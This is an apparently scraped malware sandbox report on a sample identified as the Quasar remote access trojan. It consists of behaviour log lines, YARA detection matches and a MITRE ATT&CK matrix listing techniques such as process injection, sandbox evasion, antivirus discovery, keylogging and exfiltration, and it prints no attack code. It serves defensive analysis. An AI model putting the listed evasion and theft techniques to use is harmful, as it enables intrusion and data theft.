Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: lO5lV39HDj.exe, 00000001.00000003.1840598106.0000015A0B57E000.00000004.00000020.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000003.2282442267.0000015A0B57E000.00000004.00000020.00020000.00000000.sdmp, lO5lV39HDj.exe, 00000001.00000003.1984900066.0000015A0B57E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\lO5lV39HDj.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Quasar RAT

Source: Yara match	File source: 17.2.regsvr32.exe.1c3f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2fa92de.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.13839ac0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.13839ac0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2bd12ae.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2bd12ae.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.1c3f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2fa92de.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2540192670.0000000002FA8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2541753861.0000000003831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2541753861.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2544710877.000000001C3F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2539716605.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2543209302.0000000013831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2224, type: MEMORYSTR

Remote Access Functionality

Yara detected Quasar RAT

Source: Yara match	File source: 17.2.regsvr32.exe.1c3f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2fa92de.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.13839ac0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.13839ac0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2bd12ae.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2bd12ae.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.1c3f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2fa92de.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2540192670.0000000002FA8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2541753861.0000000003831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2541753861.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2544710877.000000001C3F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2539716605.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2543209302.0000000013831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2224, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	31 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	11 Input Capture	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	2 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 Valid Accounts	1 Valid Accounts	1 Deobfuscate/Decode Files or Information	LSASS Memory	33 System Information Discovery	Remote Desktop Protocol	11 Input Capture	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Windows Service	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	1 Scheduled Task/Job	1 Windows Service	1 DLL Side-Loading	NTDS	131 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	411 Process Injection	1 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	1 Valid Accounts	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	124 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	2 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	411 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lO5lV39HDj.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Quasar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
lO5lV39HDj.exe